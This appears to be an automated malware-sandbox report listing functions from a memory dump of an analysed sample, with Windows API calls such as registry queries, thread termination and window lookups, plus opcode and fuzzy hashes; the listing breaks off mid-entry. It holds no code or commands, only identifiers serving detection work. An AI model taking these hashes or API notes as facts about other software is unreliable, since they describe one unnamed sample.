Opcode ID: e3dae372f4e97e302e8478ae24820d273dc1c5df757c2ea07b1b89084d5227e1
Instruction ID: 1dfe84b2ac689b27fcaae36aed68c3ad749d6e6ac99985360e3f5b13b395549f
Opcode Fuzzy Hash: e3dae372f4e97e302e8478ae24820d273dc1c5df757c2ea07b1b89084d5227e1
Instruction Fuzzy Hash: CD3208B4A04224CFCB64EF74C88869DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046E0D, Relevance: 2.0, APIs: 1, Instructions: 518libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3bdaeedec8551f9558f950ce400f9c6ca3e43b0b9f45e76ec5c64d4009a852ed
Instruction ID: e20ea4b5959b43f7cec15a11dbbc6f6e01e5a2b83c7656c8f12ecd248ab4f3db
Opcode Fuzzy Hash: 3bdaeedec8551f9558f950ce400f9c6ca3e43b0b9f45e76ec5c64d4009a852ed
Instruction Fuzzy Hash: E43208B4A04224CFCB64EF74C88869DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046E54, Relevance: 2.0, APIs: 1, Instructions: 511libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c2dd035c767a874faddd7d64999d70779b53f28a081344490fde552d3fdadc9
Instruction ID: 3e17a3ffe50511c4f64ff11f6cff2ac3f98f12939c8f92f5db8ffc2ca58bf1d9
Opcode Fuzzy Hash: 5c2dd035c767a874faddd7d64999d70779b53f28a081344490fde552d3fdadc9
Instruction Fuzzy Hash: F53208B4A04224CFCB64AF74C88879DB7B6BF89305F6480E9D50AA3344DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01046EB1, Relevance: 2.0, APIs: 1, Instructions: 500libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9182aa8678ed05115017e1cec4b2004182e4cb6d8b68466fb6902e61f3843593
Instruction ID: 707a82ea4baacfa374afd74c150d0582e7191037c260082e7b7c4c0be7399455
Opcode Fuzzy Hash: 9182aa8678ed05115017e1cec4b2004182e4cb6d8b68466fb6902e61f3843593
Instruction Fuzzy Hash: 1E3207B4A04224CFCB64AF74C98879DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046EF8, Relevance: 2.0, APIs: 1, Instructions: 491libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cc0fd21573b27cee2b939d232ec4e8696bc35c10571e6a7782e1f54c224d9ac
Instruction ID: d8aac1d4457be19d1508794cc780465aa6779e221e0501c1cb1bc0298d978305
Opcode Fuzzy Hash: 9cc0fd21573b27cee2b939d232ec4e8696bc35c10571e6a7782e1f54c224d9ac
Instruction Fuzzy Hash: CD3207B4A04224CFCB64AF74C88879DB7B6BF89305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01046F36, Relevance: 2.0, APIs: 1, Instructions: 486libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da4f418481addaaf1961e5b01eb5c4c7996f0778a96b5ce89477c2bef4b1d2a8
Instruction ID: c2450d550fe9bf0c63ad1390c3ca4cd6537f81c4ba3920fc2472fa77ac1a4e15
Opcode Fuzzy Hash: da4f418481addaaf1961e5b01eb5c4c7996f0778a96b5ce89477c2bef4b1d2a8
Instruction Fuzzy Hash: AD3208B4A04224CFCB64AF74C88879DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046F7D, Relevance: 2.0, APIs: 1, Instructions: 479libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22fbbe55a60e6c4fbf663a8841c68dc596c84ebd196c863d0c9316848b09f2f3
Instruction ID: a43f212ccd806af44f7a873e08d6780aa229f212acfee3c74cd3b7492e91f642
Opcode Fuzzy Hash: 22fbbe55a60e6c4fbf663a8841c68dc596c84ebd196c863d0c9316848b09f2f3
Instruction Fuzzy Hash: 592208B4A04224CFCB64AF74C88879DB7B6BF89305F6481E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046FC4, Relevance: 2.0, APIs: 1, Instructions: 472libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb0e39decff41f360fa78c39788ba780fb36fef70a8ba730a344b33e0f435729
Instruction ID: 7e584dd817acbf48099eda4f1fd93fee79ddd54f4b4609bb6c6d3aabdb1c097c
Opcode Fuzzy Hash: cb0e39decff41f360fa78c39788ba780fb36fef70a8ba730a344b33e0f435729
Instruction Fuzzy Hash: CC2208B4A04224CFCB64AF74C98879DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0104700B, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5e787d8a57a26653008347609f6042eea3ad4de96fbf61c1a3bd4f202b9e0cf
Instruction ID: d5216671def44a9c2dc822d5d69a71b4e45971843602266480911c039085c5e4
Opcode Fuzzy Hash: c5e787d8a57a26653008347609f6042eea3ad4de96fbf61c1a3bd4f202b9e0cf
Instruction Fuzzy Hash: 232218B4A04224CFCB64AF74C98879DB7B6BF89305F6480E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01047052, Relevance: 2.0, APIs: 1, Instructions: 458libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41f412d37e1871f1dd63f0e92985b41eb00a033f1cea70108e3ed4e4e7da2701
Instruction ID: 5dba259b89da809dbccb216a7ba85ba5a91c58d6391dfcc795fea49d336f98ea
Opcode Fuzzy Hash: 41f412d37e1871f1dd63f0e92985b41eb00a033f1cea70108e3ed4e4e7da2701
Instruction Fuzzy Hash: A12218B4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01047099, Relevance: 1.9, APIs: 1, Instructions: 449libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e07251fa38c388fcc382702938bcb275e3830faf8720a1dd17d95b459b070bd
Instruction ID: b5fced7a770622dcaf4481ca66e8f3b7746381dedfb337deb180892f106b4970
Opcode Fuzzy Hash: 9e07251fa38c388fcc382702938bcb275e3830faf8720a1dd17d95b459b070bd
Instruction Fuzzy Hash: E42218B4A04224CFCB64AF74C98879DB7B6BF88305F6481E9D50AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 010470ED, Relevance: 1.9, APIs: 1, Instructions: 440libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c64c606c45b1509f74edfc0d6aece72aa13b30ba52251e7535f4b95ee5aed48a
Instruction ID: 400038480d6bb8595891dee045a77eec754aaa078a0beb18e255c9063836ea01
Opcode Fuzzy Hash: c64c606c45b1509f74edfc0d6aece72aa13b30ba52251e7535f4b95ee5aed48a
Instruction Fuzzy Hash: F71209B4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01047137, Relevance: 1.9, APIs: 1, Instructions: 433libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13bf6fc63941f8dae41fef7b1f2b13f75153d58433cb6486e54784798eecf92a
Instruction ID: d8665c9ec1e93a6236c4dd439bae07afcd63750993ca7780214aba10ec5382b3
Opcode Fuzzy Hash: 13bf6fc63941f8dae41fef7b1f2b13f75153d58433cb6486e54784798eecf92a
Instruction Fuzzy Hash: 711209B4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01047181, Relevance: 1.9, APIs: 1, Instructions: 426libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: daf109b5f6ffa8148d7462442d23fb14ec9a26de3e2e2c19a4bc9e1070584dd7
Instruction ID: 3ff04e30fd57690d6ce1bbdbb2761d8a19ada58cdcac2da33b10e933fa09acb7
Opcode Fuzzy Hash: daf109b5f6ffa8148d7462442d23fb14ec9a26de3e2e2c19a4bc9e1070584dd7
Instruction Fuzzy Hash: 1F121AB4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 010471CB, Relevance: 1.9, APIs: 1, Instructions: 419libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48a94844b9f325a362a835efe287a54361f9dcb50c7fc6593494c4d37027b697
Instruction ID: 6201487852e1cfa781d03331c29e5fa2d9f5bb563ba8b4e6c2dc14e57190fb12
Opcode Fuzzy Hash: 48a94844b9f325a362a835efe287a54361f9dcb50c7fc6593494c4d37027b697
Instruction Fuzzy Hash: B2121AB4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01047215, Relevance: 1.9, APIs: 1, Instructions: 412libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0adebe14baf1a1d4456b4818b0e53c56aa2074d6b05c3092e1bbe980afedafc
Instruction ID: 08dcefa836c68332766ac0879ea29583aa24afd20eb461ee6ae5dbe4fe9ca09b
Opcode Fuzzy Hash: a0adebe14baf1a1d4456b4818b0e53c56aa2074d6b05c3092e1bbe980afedafc
Instruction Fuzzy Hash: 43121AB4A04224CFCB64AF74C98879DB7B6BF88305F6480E9D50AA3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0104725F, Relevance: 1.9, APIs: 1, Instructions: 405libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7bc222a5c1470c76804e4a3a4cb872a873a547bdd53a816b7537be8f15a8109
Instruction ID: 699d708becc7fca97a3ed20722f7a6f868625d90d6c3416b8a6d253733a5f0ed
Opcode Fuzzy Hash: d7bc222a5c1470c76804e4a3a4cb872a873a547bdd53a816b7537be8f15a8109
Instruction Fuzzy Hash: 60022AB4A042248FCB64AF74C98879DB7B6BF88305F6480E9D50AE3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 010472A9, Relevance: 1.9, APIs: 1, Instructions: 398libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 176969ace4c6c8e2c15e539643d6f598d304fa9835cd3095e800a2b423d82e9c
Instruction ID: 5db4bfe2ffbc0fb1845d6f5ce827bb9a4c6def88e54ccdd7e1823ff6e10cd1a9
Opcode Fuzzy Hash: 176969ace4c6c8e2c15e539643d6f598d304fa9835cd3095e800a2b423d82e9c
Instruction Fuzzy Hash: 72022BB4A042248FCB64AF74C98879DB7B6BF88305F6480E9D50AE3344DB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0147D120, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0147D161

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e2988416a1587de3fecf834cc72e7a1f74dcb7330bd825dab2c7dad1a8fcf4b
Instruction ID: 912f13c86319dacc4d5f0be379d0a3cd94a9b1bc483479fc3253cb2bd72acc88
Opcode Fuzzy Hash: 8e2988416a1587de3fecf834cc72e7a1f74dcb7330bd825dab2c7dad1a8fcf4b
Instruction Fuzzy Hash: 45614034E1021A9FDB14DBB4C8987EEB7F2AF88354F11882AD406EB3A4DF749945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1D1AA370, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7363251229.000000001D1A0000.00000040.00000010.sdmp, Offset: 1D1A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5516f5c3175c19990c13fdece21f7ccfb153ddabbbf5e5162d5e70c5b7ca5056
Instruction ID: 0e0d53faec098aa3eca4e6d937922408a02a45d5d7c35bf9ee068e66689da773
Opcode Fuzzy Hash: 5516f5c3175c19990c13fdece21f7ccfb153ddabbbf5e5162d5e70c5b7ca5056
Instruction Fuzzy Hash: 0A413972D083968FCB00CFB9D8143AEFBF4AF89310F19856AD508A7251DB749844CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 1E0667ED, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E06690A

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2b1e95c366b9f0c93a4aba5e98b67119f0b6f51333b3e8fded66fd2829ebc101
Instruction ID: 18fcb3b652f4128e3326815653c599f09a3065d52963c1d1910f50a49425db98
Opcode Fuzzy Hash: 2b1e95c366b9f0c93a4aba5e98b67119f0b6f51333b3e8fded66fd2829ebc101
Instruction Fuzzy Hash: EF51E2B1D003499FDF14CFA9D884ADDBFB5BF48310F64822AE815AB250D771A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E064A7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E06690A

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e9d176cdc3af27ec35b5faf532ec1e6f4c7577e9d43d92ad8d93c38f46f2e24e
Instruction ID: a42b0f159419071336a1e020e164bfec15d5f31265526ec8b0571be63214a265
Opcode Fuzzy Hash: e9d176cdc3af27ec35b5faf532ec1e6f4c7577e9d43d92ad8d93c38f46f2e24e
Instruction Fuzzy Hash: 0551C2B1D003499FDF14CFAAD984ADDBBB5BF48310F64822AE815AB210D771A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0147BB50, Relevance: 1.6, APIs: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0147BC64

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8666d1a855413e729dddba8e9dca5f78bab3458f02668f70d83177f14f5ccf93
Instruction ID: 9eeae229ed22c17b160f4f34ce1375bdd493a1c52d8cdb6302514a0c88921633
Opcode Fuzzy Hash: 8666d1a855413e729dddba8e9dca5f78bab3458f02668f70d83177f14f5ccf93
Instruction Fuzzy Hash: D24154B09043898FDB10CFA9C548A8EFFF5EF49314F29C56AD408AB356C7799845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0147BE18, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0147BF21

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1c473683cb7b44fce965274e4f6801031e8742a179d7ab9a4aeaaa4d27a07b59
Instruction ID: ae509b8a82ecf65d88e47fbfc30060b74e0ddb3626812aa5999b2b103a6a0a20
Opcode Fuzzy Hash: 1c473683cb7b44fce965274e4f6801031e8742a179d7ab9a4aeaaa4d27a07b59
Instruction Fuzzy Hash: 034124B1E043589FDB10CFA9C894ADEBBF5EF48714F14842AE948AB350D7759805CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E06A144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1E06B4E1

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1ab4a639bbcc8a191ee02dc1ee19f46522bdce2e011ace74bc1075adc1968543
Instruction ID: 8a4a9f3a4dea22ff25ed0104b34ec9f8e2a6671a64267a2723cdfdbf8d0a1714
Opcode Fuzzy Hash: 1ab4a639bbcc8a191ee02dc1ee19f46522bdce2e011ace74bc1075adc1968543
Instruction Fuzzy Hash: E44129B49006499FCB14CF99C488BAABBF5FF8C314F14C559D51AAB321C774A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0111C044, Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-74D742DE,B9598443), ref: 0111C10F

Memory Dump Source

Source File: 0000000B.00000002.7349393180.000000000111C000.00000040.00000001.sdmp, Offset: 0111C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 366372de41f469f9d4a7b5f784a4c2867c8b6165ff588c9d1b990ebcfa2c6734
Instruction ID: 33e43c0ebfd7a5a5cbdf57b0c7a51ff4b7ed2309624ce22bfa5481ed5eedf1ca
Opcode Fuzzy Hash: 366372de41f469f9d4a7b5f784a4c2867c8b6165ff588c9d1b990ebcfa2c6734
Instruction Fuzzy Hash: 0F315A71588341CFD32C8FB8D8A47E5B7E1EF12210F99817AD98B8B3AAD3344880C752

Uniqueness

Uniqueness Score: -1.00%

Function 0147B490, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0147BF21

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 06042e18b4620f5810663fc5a2090d42db8dd059e5a1d2d5e4a899863a374429
Instruction ID: 9bb65616e0245219c394d1a8ecdd57c1145e9693681ad839c1b330b3ad3d6a73
Opcode Fuzzy Hash: 06042e18b4620f5810663fc5a2090d42db8dd059e5a1d2d5e4a899863a374429
Instruction Fuzzy Hash: 1531E1B1D002589FCB10CF9AC994ADEBBF5EF48714F54842AE918AB320D7719905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0147D0C0, Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0147D161

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62324f29a39c12a850422e7269ddee99408be79688f50615ccb92004493b64b8
Instruction ID: aa8673af1e9ef9509380810dfe03cb91762c04740de10bfb00bf0b60ad3437cb
Opcode Fuzzy Hash: 62324f29a39c12a850422e7269ddee99408be79688f50615ccb92004493b64b8
Instruction Fuzzy Hash: 0D31BE30E142488FDB05CBB4C898BEE7BB2EF85314F25846AD001AB351CB799C46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0147702C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0147BC64

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ceca842673a6cd2388e7c315fa9e3e54988d9522b6f8c7d951b16ef915cab66e
Instruction ID: 1e6557f5f6d477c799a72dde66be5a06dfc87f9df726d14eecdc5fe1ec1e0b03
Opcode Fuzzy Hash: ceca842673a6cd2388e7c315fa9e3e54988d9522b6f8c7d951b16ef915cab66e
Instruction Fuzzy Hash: 10311FB0C042489FDB10CF99C688A8EFBF5EF08304F28C16AE808AB311C7759945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0111C087, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-74D742DE,B9598443), ref: 0111C10F

Memory Dump Source

Source File: 0000000B.00000002.7349393180.000000000111C000.00000040.00000001.sdmp, Offset: 0111C000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7fbed7a4e987adc5710bc2cb7129ce2c60f2483b2179da3bf1f0695264a52c12
Instruction ID: 403db62be860296e0998a6fc44e1485837a63ca210c6ce0ff2e2aac966cf6a7c
Opcode Fuzzy Hash: 7fbed7a4e987adc5710bc2cb7129ce2c60f2483b2179da3bf1f0695264a52c12
Instruction Fuzzy Hash: 0C2107316C4394CFE329DF68C5A97D97BA6DF03114F9942DAD4858F266C720589DC302

Uniqueness

Uniqueness Score: -1.00%

Function 1E06A54A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E06A5D7

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d0cc83fcd15f8d4b8783f8b0712e9e95ab91984567d994fae780d20f07cd46dc
Instruction ID: bc353149c0536f796ffcb127529bc28711c0a60a666698d8112b7cd36e8c48c5
Opcode Fuzzy Hash: d0cc83fcd15f8d4b8783f8b0712e9e95ab91984567d994fae780d20f07cd46dc
Instruction Fuzzy Hash: 4921F2B5D052489FDB10CFAAD984AEEFBF4EF48320F14851AE955A3251C374AA40CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E06A550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E06A5D7

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 52a95f6539f2414404acbd4feb8e1b0b6e6d4f3d480ceea3ff3dc775183382ca
Instruction ID: a7d5cc7152a198cfdc31cdc52c6c9dde133d97d1bad99f749fa289b84fe16450
Opcode Fuzzy Hash: 52a95f6539f2414404acbd4feb8e1b0b6e6d4f3d480ceea3ff3dc775183382ca
Instruction Fuzzy Hash: 6121B0B5D002489FDB10CFAAD984ADEFBF8EF48324F14841AE955A3351D375AA40CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01005E18, Relevance: 1.6, APIs: 1, Instructions: 60comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 01006945

Memory Dump Source

Source File: 0000000B.00000002.7348540825.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: fe1cf9c7ad21f8810b56cae8f07a656b1ca802b981f8ad8b1f1c8e9c2ccefc57
Instruction ID: 77eba92143dd897ec22b772bdc993d66d08577b0afaf77ce7474945e0e963e85
Opcode Fuzzy Hash: fe1cf9c7ad21f8810b56cae8f07a656b1ca802b981f8ad8b1f1c8e9c2ccefc57
Instruction Fuzzy Hash: AD218EB19043898FDB11CF99C5487DEFFF4EF49324F18885AD584A7241D735A900CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1D1AE77C, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 1D1AFD16

Memory Dump Source

Source File: 0000000B.00000002.7363251229.000000001D1A0000.00000040.00000010.sdmp, Offset: 1D1A0000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: b58fbf0ffddeccb50354aa3a426ea3c7bfa258e139abeebd9756a5e3ec9453cb
Instruction ID: 6d94732ff49d1d09c01a7bf6f02851c84412844a7cd25ba59b3760b5951099b8
Opcode Fuzzy Hash: b58fbf0ffddeccb50354aa3a426ea3c7bfa258e139abeebd9756a5e3ec9453cb
Instruction Fuzzy Hash: 5D2113B6C003499FCB10CF9AD584BAEFBB4FF49210F51852EE819B7244C375A944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01002AA8, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,01002A89,00000800), ref: 01002B1A

Memory Dump Source

Source File: 0000000B.00000002.7348540825.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0c926c6ff66f25b7853b354f6a5a05454b329e51dc601beb0d7c2d6e9baf5b0f
Instruction ID: bc9b80828c643049d24b0aa54250aeb4489c3ebd4c3a76dd9f81be43701f7b88
Opcode Fuzzy Hash: 0c926c6ff66f25b7853b354f6a5a05454b329e51dc601beb0d7c2d6e9baf5b0f
Instruction Fuzzy Hash: 9B1103B1D002498FDB10CFAAD548BDEFBF4AF89310F14842AD959A7241C779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D1AFC9B, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 1D1AFD16

Memory Dump Source

Source File: 0000000B.00000002.7363251229.000000001D1A0000.00000040.00000010.sdmp, Offset: 1D1A0000, based on PE: false

Similarity

